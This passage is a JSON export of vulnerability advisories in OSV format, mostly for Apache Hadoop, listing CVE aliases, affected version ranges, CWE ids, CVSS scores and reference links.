"https://lists.apache.org/thread.html/5fb771f66946dd5c99a8a5713347c24873846f555d716f9ac17bccca@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190416-0009" } ], "database_specific": { "cwe_ids": [ "CWE-269" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:00:30Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6x48-j4x4-cqw3", "published": "2018-12-21T17:50:29Z", "modified": "2024-03-04T23:01:37.312585Z", "aliases": [ "CVE-2018-8009" ], "summary": "Path Traversal in Hadoop", "details": "Apache Hadoop 3.1.0, 3.0.0-alpha to 3.0.2, 2.9.0 to 2.9.1, 2.8.0 to 2.8.4, 2.0.0-alpha to 2.7.6, 0.23.0 to 0.23.11 is exploitable via the zip slip vulnerability in places that accept a zip file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.1.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.0.3" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.7" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-6x48-j4x4-cqw3/GHSA-6x48-j4x4-cqw3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-8009" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/12258c7cff8d32710fbd8b9088a930e3ce27432" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/45a1c680c276c4501402f7bc4cebcf85a6fbc7f" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/65e55097da2bb3f2fbdf9ba1946da25fe58bec9" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/6a4ae6f6eeed1392a4828a5721fa1499f65bdde" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/fc4c20fc3469674cb584a4fb98bac7e3c2277c9" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-6x48-j4x4-cqw3" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://hadoop.apache.org/cve_list.html#cve-2018-8009-http-cve-mitre-org-cgi-bin-cvename-cgi-name-cve-2018-8009-zip-slip-impact-on-apache-hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a1c227745ce30acbcf388c5b0cc8423e8bf495d619cd0fa973f7f38d@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://snyk.io/research/zip-slip-vulnerability" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/105927" } ], "database_specific": { "cwe_ids": [ "CWE-22" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:20:31Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-99qr-9cc9-fv2x", "published": "2018-12-21T17:50:03Z", "modified": "2023-11-08T03:59:20.833209Z", "aliases": [ "CVE-2017-3166" ], "summary": "Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main", "details": "In Apache Hadoop versions 2.6.1 to 2.6.5, 2.7.0 to 2.7.3, and 3.0.0-alpha1, if a file in an encryption zone with access permissions that make it world readable is localized via YARN's localization mechanism, that file will be stored in a world-readable location and can be shared freely with any application that requests to localize that file.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-99qr-9cc9-fv2x/GHSA-99qr-9cc9-fv2x.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-3166" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-99qr-9cc9-fv2x" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2e16689b44bdd1976b6368c143a4017fc7159d1f2d02a5d54fe9310f@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-732" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:28:07Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c6f9-4pmv-m7m6", "published": "2022-05-17T02:54:07Z", "modified": "2024-12-06T05:37:36.225387Z", "aliases": [ "CVE-2012-1574" ], "summary": "Apache Hadoop allows impersonation of arbitrary cluster user accounts", "details": "The Kerberos/MapReduce security functionality in Apache Hadoop 0.20.203.0 through 0.20.205.0, 0.23.x before 0.23.2, and 1.0.x before 1.0.2, as used in Cloudera CDH CDH3u0 through CDH3u2, Cloudera hadoop-0.20-sbin before 0.20.2+923.197, and other products, allows remote authenticated users to impersonate arbitrary cluster user accounts via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23" }, { "fixed": "0.23.2" } ] } ], "versions": [ "0.23.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c6f9-4pmv-m7m6/GHSA-c6f9-4pmv-m7m6.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.0" }, { "fixed": "1.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-c6f9-4pmv-m7m6/GHSA-c6f9-4pmv-m7m6.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-1574" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://seclists.org/fulldisclosure/2012/Apr/70" }, { "type": "WEB", "url": "https://web.archive.org/web/20120720041621/https://ccp.cloudera.com/display/DOC/Cloudera+Security+Bulletin#ClouderaSecurityBulletin-MapReducewithSecurity" }, { "type": "WEB", "url": "https://web.archive.org/web/20151001135054/http://archives.neohapsis.com/archives/bugtraq/2012-04/0051.html" }, { "type": "WEB", "url": "https://web.archive.org/web/20161215212154/https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html#topic_1_0_2" }, { "type": "WEB", "url": "https://web.archive.org/web/20200229125105/http://www.securityfocus.com/bid/52939" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2023-08-29T21:08:04Z", "nvd_published_at": "2012-04-12T10:45:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-hx83-rpqf-m267", "published": "2019-11-20T01:38:00Z", "modified": "2023-11-08T03:59:47.193372Z", "aliases": [ "CVE-2018-11768" ], "summary": "user/group information can be corrupted across storing in fsimage and reading back from fsimage", "details": "In Apache Hadoop 3.1.0 to 3.1.1, 3.0.0-alpha1 to 3.0.3, 2.9.0 to 2.9.1, and 2.0.0-alpha to 2.8.4, the user/group information can be corrupted across storing in fsimage and reading back from fsimage.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.2.0" }, { "fixed": "2.8.5" } ] } ], "versions": [ "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.2" } ] } ], "versions": [ "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0" }, { "fixed": "3.1.1" } ] } ], "versions": [ "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.1.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-hx83-rpqf-m267/GHSA-hx83-rpqf-m267.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11768" }, { "type": "WEB", "url": "https://hadoop.apache.org/cve_list.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2067a797b330530a6932f4b08f703b3173253d0a2b7c8c524e54adaf@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2c9cc65864be0058a5d5ed2025dfb9c700bf23d352b0c826c36ff96a@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/72ca514e01cd5f08151e74f9929799b4cbe1b6e9e6cd24faa72ffcc6@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/9b609d4392d886711e694cf40d86f770022baf42a1b1aa97e8244c87@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/caacbbba2dcc1105163f76f3dfee5fbd22e0417e0783212787086378@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ceb16af9139ab0fea24aef935b6321581976887df7ad632e9a515dda@%3Cdev.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ea6d2dfbefab8ebe46be18b05136b83ae53b7866f1bc60c680a2b600@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f20bb4e055d8394fc525cc7772fb84096f706389043e76220c8a29a4@%3Chdfs-dev.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r02e39d7beb32eebcdbb4b516e95f67d71c90d5d462b26f4078d21eeb@%3Cuser.flink.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": true, "github_reviewed_at": "2019-11-19T03:28:12Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-mq8p-h798-xcrp", "published": "2018-12-21T17:50:20Z", "modified": "2023-11-08T03:58:58.669059Z", "aliases": [ "CVE-2017-15718" ], "summary": "Exposure of Sensitive Information in Hadoop", "details": "The YARN NodeManager in Apache Hadoop 2.7.3 and 2.7.4 can leak the password for credential store provider used by the NodeManager to YARN Applications.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.3" }, { "fixed": "2.7.5" } ] } ], "versions": [ "2.7.3", "2.7.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-mq8p-h798-xcrp/GHSA-mq8p-h798-xcrp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-15718" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-mq8p-h798-xcrp" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/773c93c2d8a6a52bbe97610c2b1c2ad205b970e1b8c04fb5b2fccad6@%3Cgeneral.hadoop.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:47:00Z", "nvd_published_at": null, "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rhh9-cm65-3w54", "published": "2021-04-30T17:29:30Z", "modified": "2024-02-17T05:34:33.603105Z", "aliases": [ "CVE-2018-11765" ], "summary": "Improper Authentication in Apache Hadoop", "details": "In Apache Hadoop versions 3.0.0-alpha2 to 3.0.0, 2.9.0 to 2.9.2, 2.8.0 to 2.8.5, any users can access some servlets without authentication when Kerberos authentication is enabled and SPNEGO through HTTP is not enabled.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha2" }, { "fixed": "3.0.1" } ] } ], "versions": [ "3.0.0", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 3.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.3" } ] } ], "versions": [ "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.6" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.5", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/04/GHSA-rhh9-cm65-3w54/GHSA-rhh9-cm65-3w54.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11765" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17d94d132b207dad221595fd8b8b18628f5f5ec7e3f5be939ecd8928@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2c7f899911a04164ed1707083fcd4135f8427e04778c87d83509b0da%40%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r46447f38ea8c89421614e9efd7de5e656186d35e10fc97cf88477a01@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4dddf1705dbedfa94392913b2dad1cd2d1d89040facd389eea0b3510@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r74825601e93582167eb7cdc2f764c74c9c6d8006fa90018562fda60f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r79b15c5b66c6df175d01d7560adf0cd5c369129b9a161905e0339927@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb21df54a4e39732ce653d2aa5672e36a792b59eb6717f2a06bb8d02a@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb241464d83baa3749b08cd3dabc8dba70a9a9027edcef3b5d4c24ef4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbe25cac0f499374f8ae17a4a44a8404927b56de28d4c41940d82b7a4@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reea5eb8622afbfbfca46bc758f79db83d90a3263a906c4d1acba4971@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf9dfa8b77585c9227db9637552eebb2ab029255a0db4eb76c2b6c4cf@%3Cdev.druid.apache.org%3E" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20201016-0005" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2021-04-27T21:56:41Z", "nvd_published_at": "2020-09-30T18:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rqj9-cq6j-958r", "published": "2018-12-21T17:50:26Z", "modified": "2024-12-02T05:44:05.029076Z", "aliases": [ "CVE-2018-11766" ], "summary": "Arbitrary Command Execution in Hadoop", "details": "In Apache Hadoop 2.7.4 to 2.7.6, the security fix for CVE-2016-6811 is incomplete. A user who can escalate to yarn user can possibly run arbitrary commands as root user.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.4" }, { "fixed": "2.7.7" } ] } ], "versions": [ "2.7.4", "2.7.5", "2.7.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/12/GHSA-rqj9-cq6j-958r/GHSA-rqj9-cq6j-958r.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-11766" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-rqj9-cq6j-958r" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ff37bbbe09d5f03090e2dd2c3dea95de16ef4249e731f19b8959ce4c@%3Cgeneral.hadoop.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106035" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:32Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v569-g72v-q434", "published": "2019-02-12T17:26:12Z", "modified": "2023-11-08T03:59:51.778695Z", "aliases": [ "CVE-2018-1296" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Hadoop", "details": "In Apache Hadoop 3.0.0-alpha1 to 3.0.0, 2.9.0, 2.8.0 to 2.8.3, and 2.5.0 to 2.7.5, HDFS exposes extended attribute key/value pairs during listXAttrs, verifying only path-level search access to the directory rather than path-level read permission to the referent.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.6" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.2", "2.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.1" } ] } ], "versions": [ "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/02/GHSA-v569-g72v-q434/GHSA-v569-g72v-q434.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1296" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-v569-g72v-q434" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a5b15bc76fbdad2ee40761aacf954a13aeef67e305f86d483f267e8e@%3Cuser.hadoop.apache.org%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/106764" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:56:41Z", "nvd_published_at": null, "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-v5c9-98f7-2h54", "published": "2022-04-23T00:40:07Z", "modified": "2024-02-16T08:24:21.090651Z", "aliases": [ "CVE-2012-2945" ], "summary": "Hadoop symlink vulnerability", "details": "Hadoop 1.0.3 contains a symlink vulnerability as a result of storing pid files in the shared `/tmp` directory by default.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-main", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-main" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.4" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/04/GHSA-v5c9-98f7-2h54/GHSA-v5c9-98f7-2h54.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-2945" }, { "type": "WEB", "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535861" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://seclists.org/fulldisclosure/2012/Jul/3" }, { "type": "WEB", "url": "https://security-tracker.debian.org/tracker/CVE-2012-2945" } ], "database_specific": { "cwe_ids": [ "CWE-377", "CWE-59" ], "github_reviewed": true, "github_reviewed_at": "2023-08-29T19:54:42Z", "nvd_published_at": "2019-10-29T19:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2x83-r56g-cv47", "published": "2018-10-17T00:05:15Z", "modified": "2024-12-02T05:48:49.049751Z", "aliases": [ "CVE-2012-6153" ], "summary": "Improper certificate validation in org.apache.httpcomponents:httpclient", "details": "http/conn/ssl/AbstractVerifier.java in Apache Commons HttpClient before 4.2.3 does not properly verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a certificate with a subject that specifies a common name in a field that is not the CN field. NOTE: this issue exists because of an incomplete fix for CVE-2012-5783.", "affected": [ { "package": { "name": "org.apache.httpcomponents:httpclient", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.httpcomponents/httpclient" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.3" } ] } ], "versions": [ "4.0", "4.0-alpha1", 